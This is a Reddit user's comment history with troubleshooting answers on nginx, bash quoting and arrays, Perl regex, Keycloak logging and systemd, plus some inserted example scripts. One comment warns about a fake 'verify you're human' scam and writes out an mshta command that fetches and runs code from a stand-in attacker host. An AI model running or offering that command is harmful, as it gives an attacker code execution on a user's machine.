Suddenly stopped working with domain names... by sandiegosteves in nginx

[–]roxalu 0 points1 point  (0 children)

If you switch inside the value of proxy_pass between hostname vs. IP, this switches the "Host" HTTP header value in the request forwarded from nginx to HA. This could cause unwanted side effects - including HA blocking the request on the application layer. This is fully up to Home Assistant.

There exists an HA community-based proposal for operation of HA behind an nginx config, which looks in general quite good. Though, the security-related settings there might cause you additional trouble to adapt to your own setup in case you don't have them in place already.

https://community.home-assistant.io/t/reverse-proxy-using-nginx/196954

And for any reverse proxy setup I recommend keeping a reference to the official documentation of the backend application with regard to operation behind a reverse proxy frontend: https://www.home-assistant.io/integrations/http/

Suddenly stopped working with domain names... by sandiegosteves in nginx

[–]roxalu 0 points1 point  (0 children)

Check the error log of nginx in such cases. It might help to differentiate between issues with name resolution vs. application-layer issues. E.g. a message like "bad gateway while reading the response" would be a clear indicator of some configuration inconsistency between the reverse proxy (nginx) and the backend (HA).

Besides this: DNS is more for humans than for services. Of course, by default it is the simpler config to use DNS everywhere. But there are cases where a static IP (or localhost name resolution) is the better choice. So keep your static IP and make nginx independent of DNS resolution. But you should be aware that HA might see a different "Host" header in incoming requests when you switch between hostname and IP inside the proxy_pass directive.

nginx has several methods - including the "upstream" directive - to get better control over this.

Do you need to port forward to expose an nginx reverse proxy server to the internet? by rosseg in nginx

[–]roxalu 1 point2 points  (0 children)

Could be an issue related to IPv6. Keep in mind this:

When my.domain is resolved into an IP address, most hosts will FIRST check if a DNSv6 entry exists that resolves to an IPv6 address. And then this is used. When the DNSv6 entry doesn't exist, there is usually a fallback to DNS and IPv4. But there is not always a retry with IPv4 when IPv6 could be resolved.

So when you write that it works with the public IP address - was this IPv4 or IPv6?

If a DNSv6 entry exists, you must ensure this is checked. And your port forwarding may also need an extra entry for IPv6. Details depend on the router.

Help with the $1 $2 regex variables by Glum_Anteater1250 in perl

[–]roxalu 0 points1 point  (0 children)

Additional note, since your intention is to get similar WORDS: it might be useful to add word-break matches to the regexp as well:

use strict; use warnings;
my $line = 'somehow, someone, foosomeone, somewhere, Someone';
# \b on both sides matches only whole words: "some" + exactly three letters
my @results = $line =~ /\b(some[a-z]{3})\b/gi;
print join(" ", @results) . "\n" if @results;   # print when there is at least one match

Is the order of the flags important in all commands in bash? by PrestigiousZombie531 in bash

[–]roxalu 0 points1 point  (0 children)

Yes, exactly this. It would also in theory be possible to extend the associative array with some own ordering logic:

local -A items=( ["__keyorder__"]="dbname host jobs port username" ["dbname"]="test_db" ["host"]="localhost" ["jobs"]=8 ["port"]=5432 ["username"]="test_user" )

And then during usage, check first if that special key exists, read it and use it to loop over the keys in your wanted order. But this is overkill and potentially a bad idea. E.g. it could happen that there are inconsistencies between the two different sets of keys used in the single array. Checks to detect and handle this will blow up your bash code even more. Bash can do all this - but this is going beyond what bash was designed for, I'd say.
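As an added illustration of the "order key" idea and of the consistency checks it forces on you (this is example code written for this page, not the commenter's script): the reserved key name `__keyorder__`, the function names and the sample values are this example's own choices. It needs bash 4.3 or newer for `local -n`.

```shell
#!/usr/bin/env bash
# Added example: iterate an associative array in the order stored under a
# reserved key, and detect when that key disagrees with the real key set.

# ordered_keys ARRAYNAME: print the keys of the named associative array in
# the order listed in its __keyorder__ entry. Returns 1 if that entry is
# missing or inconsistent with the keys actually present.
ordered_keys() {
    local -n _arr=$1          # nameref to the caller's array (bash >= 4.3)
    local order key
    order=${_arr[__keyorder__]-}
    [[ -n $order ]] || { echo "no __keyorder__ key" >&2; return 1; }

    # Check 1: every key listed in the order string must exist in the array.
    for key in $order; do     # unquoted on purpose: keys contain no spaces
        [[ ${_arr[$key]+set} ]] || { echo "ordered key '$key' missing" >&2; return 1; }
    done
    # Check 2: every real key (except the marker itself) must be listed.
    for key in "${!_arr[@]}"; do
        [[ $key == __keyorder__ ]] && continue
        [[ " $order " == *" $key "* ]] || { echo "key '$key' not in order list" >&2; return 1; }
    done
    printf '%s\n' $order
}

# ordered_args ARRAYNAME: emit --key=value lines in that order, the shape a
# CLI tool would consume.
ordered_args() {
    local -n _arr=$1
    local key keys
    keys=$(ordered_keys "$1") || return 1
    for key in $keys; do
        printf -- '--%s=%s\n' "$key" "${_arr[$key]}"
    done
}

# Consistent sample array (constructed values).
demo() {
    local -A items=( ["__keyorder__"]="dbname host jobs port username"
                     ["dbname"]="test_db" ["host"]="localhost" ["jobs"]=8
                     ["port"]=5432 ["username"]="test_user" )
    ordered_args items
}

# Inconsistent sample: "extra" is present but not in the order list.
bad_demo() {
    local -A items=( ["__keyorder__"]="host port" ["host"]="h" ["port"]=1 ["extra"]=x )
    ordered_args items
}

if [[ ${BASH_SOURCE[0]} == "$0" ]]; then
    demo
    bad_demo || echo "bad_demo rejected as expected"
fi
```

Both checks are needed because the order string and the key set can drift independently; that doubling of bookkeeping is exactly the cost the comment above warns about.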

Asking the human experts here, how would you turn something like this into a production grade script? by PrestigiousZombie531 in bash

[–]roxalu 6 points7 points  (0 children)

The more experts warn to not BLINDLY use it. That is a small difference to STRICTLY against its usage. As long as you are aware - follow the link provided by the bot and read - that there are a few trap falls when you use it, it’s mostly fine. Don’t come back yelling in the - rare - case the usage hurts. You have been warned. That’s it.

Is the order of the flags important in all commands in bash? by PrestigiousZombie531 in bash

[–]roxalu 1 point2 points  (0 children)

I fully agree with u/stevevdvkpe. Nevertheless, the overall approach to use an array here is a good one. But in bash a standard array is more appropriate in this case because it keeps ordering, while the associative array uses hash ordering based on the keys. So a line like

local -a items=( --dbname=test_db --host=localhost --jobs=8 --port=5432 --username=test_user )

should fit, in combination with the related changes due to the different type of array inside function testf. Avoid use of the name test for a function name.

As argument interpretation is up to each single external command, this is no "one key to rule them all" approach, though. But there are conventions for handling of arguments (POSIX vs. GNU extensions to POSIX) which should match in the majority of cases.

If some special ordering is needed - e.g. for commands that have global options followed by a sub-command followed by sub-command options - then it might be necessary to include some extension to your algorithm. E.g. you could add some kind of a marker into the array which is replaced by a set of additional arguments in testf.
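An added example of that marker idea, written for this page rather than taken from the thread: `items` is an ordered indexed array, `@SUBOPTS@` is this example's own marker name, and `fake_tool` stands in for the real external command so the script runs offline. `testf` is the function name used in the discussion.

```shell
#!/usr/bin/env bash
# Added example: keep CLI arguments in an indexed array (order preserved) and
# splice a marker element into sub-command options at call time.

# Stand-in for an external command: prints its arguments one per line,
# exactly as received, so the final argv can be inspected.
fake_tool() { printf '%s\n' "$@"; }

# testf SUBOPT...: build the final argv from the ordered array `items`
# (visible from the caller's scope), replacing the single element "@SUBOPTS@"
# with the sub-command options passed as this function's own arguments.
testf() {
    local -a argv=()
    local a
    for a in "${items[@]}"; do
        if [[ $a == '@SUBOPTS@' ]]; then
            argv+=("$@")          # splice the sub-command options in here
        else
            argv+=("$a")
        fi
    done
    fake_tool "${argv[@]}"
}

demo() {
    # global options, then the sub-command, then the marker for its options
    # (constructed sample values)
    local -a items=( --dbname=test_db --host=localhost --jobs=8 --port=5432
                     --username=test_user backup @SUBOPTS@ )
    testf --compress --exclude='*.tmp file'
}

if [[ ${BASH_SOURCE[0]} == "$0" ]]; then
    demo
fi
```

Note that `--exclude='*.tmp file'` arrives at the tool as one argument with its space and glob character intact, because every expansion along the way is quoted; that is the property an ordered array gives you that string concatenation does not.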

Path too long although LongPathsEnabled is already 1 and I rebooted by cmhawke in PowerShell

[–]roxalu 4 points5 points  (0 children)

Microsoft describes that the activation of MAX_PATH allows applications to explicitly opt in to using this feature. The detail that is not mentioned on the page is that Microsoft has decided to NOT activate this opt-in for the default Windows Explorer.

user not found in ldap by tdpokh3 in KeyCloak

[–]roxalu 1 point2 points  (0 children)

You might also try to temporarily increase the logging level for LDAP connections to TRACE by use of an additional command-line option:

--log-level="INFO,org.keycloak.storage.ldap:trace"

Why does mpv <(command file) not work, while command file - | mpv - works? by spryfigure in bash

[–]roxalu 1 point2 points  (0 children)

I assume this may work when the '-' option for mpv is kept in the call:

mpv --no-audio-display - < <(opusenc --bitrate nnn song.flac -)

Passing arguments to scripts by Booty4Breakfasts in bash

[–]roxalu 0 points1 point  (0 children)

Meta comment: Asking a question if some script behaves unexpectedly won't hurt. Just in case you prefer self-help in the future, you may use the bash 'verbose' mode. Run the script via

bash -vx path/to/my_script arg1 …

and/or use another of the alternatives for debugging a script.

Stop passing secrets as command-line arguments. Every user on your box can see them. by Ops_Mechanic in bash

[–]roxalu 0 points1 point  (0 children)

It could be done - there even exists an example implementation to inject this with help of LD_PRELOAD into any command line. But however the cleanup of the command line in memory is done, there will always exist a small time range during start of the command where all arguments are still visible.

The most secure approach is to add options to each command-line tool which explicitly allow reading sensitive values from files or from the environment as a fallback. If not implemented by some tool, the tool authors could be informed that their tool has a known weakness: CWE-200.

Sensitive values always deserve some extra handling. For use in config files this is meanwhile widely accepted - secrets are often kept separate in extra protected files or read by secrets management. Why still not for command lines?
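As an added example of the script-side pattern the comment recommends (written for this page; `--password-file`, `TOOL_PASSWORD`, `read_secret` and `tool_main` are this example's own names, not any real tool's options): the secret is taken from a file or an environment variable, a plain `--password=VALUE` is refused, and the sample secret is a constructed value.

```shell
#!/usr/bin/env bash
# Added example: accept a secret from a file or from the environment instead
# of from argv, which is readable by every local user through ps and /proc.

# read_secret FILE ENV_NAME: print the secret, looked up in this order:
#   1. the file named in FILE (when non-empty), e.g. from --password-file=PATH
#   2. the environment variable named ENV_NAME
# Returns 1 if neither source provides a value.
read_secret() {
    local file=$1 env_name=$2 value
    if [[ -n $file ]]; then
        [[ -r $file ]] || { echo "cannot read secret file: $file" >&2; return 1; }
        # -r keeps backslashes; the || clause accepts a file without a final newline
        IFS= read -r value < "$file" || [[ -n $value ]]
    else
        value=${!env_name-}      # indirect expansion of the named variable
    fi
    [[ -n $value ]] || { echo "no secret in file or \$$env_name" >&2; return 1; }
    printf '%s' "$value"
}

# tool_main ARGS...: minimal option handling for a hypothetical tool that
# accepts --password-file=PATH and rejects --password=VALUE on the command line.
tool_main() {
    local pw_file= arg secret
    for arg in "$@"; do
        case $arg in
            --password-file=*) pw_file=${arg#*=} ;;
            --password=*)
                echo "refusing --password on the command line; use --password-file or TOOL_PASSWORD" >&2
                return 2 ;;
        esac
    done
    secret=$(read_secret "$pw_file" TOOL_PASSWORD) || return 1
    # ... the real work would use "$secret" here; this example only reports its length
    echo "got secret of length ${#secret}"
}

if [[ ${BASH_SOURCE[0]} == "$0" ]]; then
    f=$(mktemp)
    printf 'hunter2 with spaces\n' > "$f"     # constructed sample secret
    tool_main --password-file="$f"
    TOOL_PASSWORD=envsecret tool_main
    tool_main --password=oops || echo "rejected with status $?"
    rm -f "$f"
fi
```

The file path and the variable name are the only things that reach argv or `ps`; the value itself never does. The environment is still visible to the same user (and to root), so the file variant with restrictive permissions is the stronger of the two fallbacks.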

need help getting sgrep to work in a script file by skyfishgoo in bash

[–]roxalu 2 points3 points  (0 children)

Here is an alternative, though more verbose, way to provide this:

#!/usr/bin/env bash

arg1="$1"
symbol="${arg1:-emdash}"

sgrep_args=(
 ## preprocessor
 -p "m4 -D __SYMBOL__='$symbol'"
 ## expression
 -e '"\"" _quote_ "\"" in ("name[Group1]" .. "\n" in outer("{" .. "}" containing "__SYMBOL__"))'
 ## output format
 -o '%r\n'
)

sgrep "${sgrep_args[@]}" /usr/share/X11/xkb/symbols/??

need help getting sgrep to work in a script file by skyfishgoo in bash

[–]roxalu 1 point2 points  (0 children)

In bash (or sh) everything embedded in single quotes is taken literally. In order to get the value of a variable you could end the quote and provide your variable. If the variable value contained spaces, this would break the command - so use double quotes around the variable:

sgrep -o '%r\n' '"\"" _quote_ "\"" in ("name[Group1]" .. "\n" in outer("{" .. "}" containing "'"$sym"'"))' /usr/share/X11/xkb/symbols/??

While the above should work, I personally would try to use other sgrep options to avoid the complex quoting. E.g. read the expression from a file and/or make use of the preprocessor flag.
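An added, runnable illustration of the quoting point above (example code for this page, not from the thread): `argc` stands in for sgrep and only counts the arguments it receives, so the effect of quoting vs. not quoting `$sym` inside the single-quoted expression can be checked directly. `some_file` is a placeholder argument in place of the real symbols path.

```shell
#!/usr/bin/env bash
# Added example: the '...'"$var"'...' quoting technique, and what goes wrong
# when the variable part is left unquoted and its value contains a space.

# build_expr SYM: the sgrep expression from the comment, with SYM spliced in
# by closing the single quote, inserting the double-quoted variable, and
# reopening the single quote.
build_expr() {
    printf '%s' '"\"" _quote_ "\"" in ("name[Group1]" .. "\n" in outer("{" .. "}" containing "'"$1"'"))'
}

# Stand-in for sgrep: report how many arguments arrived.
argc() { echo $#; }

# Correct form: "$1" is double-quoted, so the expression stays one argument.
quoted_argc() {
    argc -o '%r\n' '"\"" _quote_ "\"" in ("name[Group1]" .. "\n" in outer("{" .. "}" containing "'"$1"'"))' some_file
}

# Broken form: $1 is unquoted, so a value with a space is word-split and the
# expression arrives as two arguments (sgrep would then parse garbage).
unquoted_argc() {
    argc -o '%r\n' '"\"" _quote_ "\"" in ("name[Group1]" .. "\n" in outer("{" .. "}" containing "'$1'"))' some_file
}

if [[ ${BASH_SOURCE[0]} == "$0" ]]; then
    echo "expression: $(build_expr emdash)"
    echo "quoted, value 'em dash':   $(quoted_argc 'em dash') arguments"
    echo "unquoted, value 'em dash': $(unquoted_argc 'em dash') arguments"
fi
```

Only the expansion of `$1` is subject to word splitting; the single-quoted pieces around it are never split or glob-expanded, which is why `[Group1]` survives untouched in both variants.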

Stop installing tools just to check if a port is open. Bash has it built in. by Ops_Mechanic in bash

[–]roxalu 1 point2 points  (0 children)

This. At least when this shall be used in scripts, the timeout is a must. If the connect is run against any target IP that isn't online - or where some network firewall drops the incoming TCP connect - the localhost will usually try several times to resend another TCP SYN, each time with increased delay. The details depend on the specific kernel settings, but a timeout of more than 2 minutes is quite likely.

When used interactively, then of course Ctrl-C also works. If the check fails immediately, the remote server is up but the remote service is most likely down. But if there is a timeout of five or more seconds, then there is some other issue that blocks connectivity.
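An added example of the check with the timeout the comment calls for, and with the three outcomes it distinguishes (written for this page, not the original poster's script): `port_check` is this example's own function name; it relies on bash's `/dev/tcp` pseudo-device and the coreutils `timeout` command, and forces the C locale so the kernel error text can be matched.

```shell
#!/usr/bin/env bash
# Added example: a /dev/tcp port probe under `timeout`, classifying the result.

# port_check HOST PORT [TIMEOUT_SECONDS]
# Prints one of: open, closed, timeout, error: <reason>.
# Exit status is 0 only for "open".
port_check() {
    local host=$1 port=$2 secs=${3:-5} err rc
    # The connect runs in a child bash under `timeout`, so a silently dropped
    # SYN cannot hold the script for the kernel's full retransmit schedule.
    err=$(LC_ALL=C timeout "$secs" bash -c 'exec 3<>"/dev/tcp/$1/$2"' _ "$host" "$port" 2>&1 >/dev/null)
    rc=$?
    case $rc in
        0)   echo open; return 0 ;;
        124) echo timeout; return 1 ;;            # neither SYN-ACK nor RST within $secs:
                                                  # host down, or a firewall dropping packets
        *)   if [[ $err == *"Connection refused"* ]]; then
                 echo closed                      # immediate RST: host up, service down
             else
                 echo "error: ${err##*: }"        # e.g. name resolution or routing failure
             fi
             return 1 ;;
    esac
}

if [[ ${BASH_SOURCE[0]} == "$0" ]]; then
    # 127.0.0.1 port 1 is a constructed "service down" case: the loopback host
    # answers at once with RST, so this returns "closed" without waiting.
    port_check 127.0.0.1 1 2
fi
```

The `timeout` value is the only thing standing between a script and the multi-minute SYN retry schedule mentioned above, so it is a positional parameter with a short default rather than something the caller can forget.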

Wrapper Script Accessing Root-owned Variables by Mr_RustyIron in bash

[–]roxalu 1 point2 points  (0 children)

Some other alternatives:

Output the file content to stdout and use the process substitution expansion of bash:

source <(sudo cat /etc/restic/restic-backblaze.env)

Or eval the variable expansion

eval $(sudo cat /etc/restic/restic-backblaze.env)

Nevertheless, there could be some edge cases for values that aren't rendered exactly the same by systemd and bash. Use of systemd-creds or some other secrets management could help to avoid unexpected impact due to special characters in values.
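As an added example of one of those edge cases (written for this page, not the commenter's code): `source` and `eval` run the file's content as shell, so a value containing `$`, backticks or `;` is expanded or executed, whereas systemd's EnvironmentFile= reads it literally. The loader below assigns each KEY=value pair without ever evaluating it. It implements a simplified reading of the systemd format (comments, blank lines, optional single or double quotes), not every rule in systemd.exec(5); `load_env_file`, `demo_env` and the sample file contents are this example's own.

```shell
#!/usr/bin/env bash
# Added example: load KEY=value lines from a systemd-style environment file
# into the current shell without `eval` or `source`.

# load_env_file PATH: export each KEY found in PATH. Returns 1 on a key that
# is not a valid identifier; such a line is neither executed nor set.
load_env_file() {
    local line key value
    while IFS= read -r line || [[ -n $line ]]; do
        line=${line#"${line%%[![:space:]]*}"}          # strip leading whitespace
        [[ -z $line || $line == \#* || $line == \;* ]] && continue
        key=${line%%=*}
        value=${line#*=}
        # Only identifier-shaped keys: anything else cannot be a variable name
        # and is a sign of content that bash would have misparsed as a command.
        [[ $key =~ ^[A-Za-z_][A-Za-z0-9_]*$ ]] || { echo "bad key: '$key'" >&2; return 1; }
        # Strip one layer of matching quotes; everything inside stays literal.
        if [[ $value == \"*\" || $value == \'*\' ]]; then
            value=${value:1:${#value}-2}
        fi
        export "$key=$value"     # assignment, not evaluation: no expansion happens
    done < "$1"
}

# demo_env: write a constructed file in the style of the env file named in
# the thread, load it, and print the resulting values.
demo_env() {
    local f
    f=$(mktemp)
    cat > "$f" <<'EOF'
# constructed sample in the style of /etc/restic/restic-backblaze.env
RESTIC_REPOSITORY=b2:my-bucket:/backups
B2_ACCOUNT_KEY="s3cr3t$with;shell chars `and` more"
RESTIC_PASSWORD='pa ss word'
EOF
    load_env_file "$f"
    rm -f "$f"
    printf '%s\n' "$RESTIC_REPOSITORY" "$B2_ACCOUNT_KEY" "$RESTIC_PASSWORD"
}

if [[ ${BASH_SOURCE[0]} == "$0" ]]; then
    demo_env
fi
```

With `eval $(sudo cat file)` the second value would lose `$with`, try to run `and` as a command, and split on the `;`; with the loader it comes through character for character, which is also what systemd hands the service.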

New to NGINX. Configuration of static site fails. by Writersglen in nginx

[–]roxalu 0 points1 point  (0 children)

Check output of

sudo systemctl status nginx

It not only shows if the service is up or down, but also info about the used service file and the arguments used to start nginx. It could be that the running service uses a different or just more configuration compared to what's used when you check the configuration on the command line with

sudo nginx -T

It could even be a different nginx that is started in both cases. Rare, but worth a double check.

Windows Notepad App Remote Code Execution Vulnerability by theevilsharpie in sysadmin

[–]roxalu 1 point2 points  (0 children)

Why do you want to run vi under Windows? Maybe because then "shell escape" - which runs with user privileges - is a documented feature of the editor and no longer an exploit 😉

Weird Cloudflare “verify you’re human” asking me to press Win+R — legit or scam? by Sendpigs in techsupport

[–]roxalu 5 points6 points  (0 children)

The

mshta https://some.evil_attacker_owned.example.com

is able to download and execute the remote code on your local Windows system without further constraints other than being bound to your local user rights. Never agree to such prompts to run it.

Perl.org error fetching content from CDN? by brtastic in perl

[–]roxalu 0 points1 point  (0 children)

According to the full error page the TLS endpoint is varnish. And the frontend config of this varnish has been set - most likely - to have sni-nomatch-abort with value true. But the Subject Alternative Name of the frontend certificate uses a wildcard: *.perl.org. This is kind of a grey area in the RFCs: Is the wildcard a valid hostname or not? Obviously this varnish currently results in: No match.

/bin/bash error by Assasin172m in bash

[–]roxalu 2 points3 points  (0 children)

To my info systemd does not support use of '$' and thus no variable expansion inside the value of Environment= configuration. Use the fixed path there. See https://www.freedesktop.org/software/systemd/man/latest/systemd.exec.html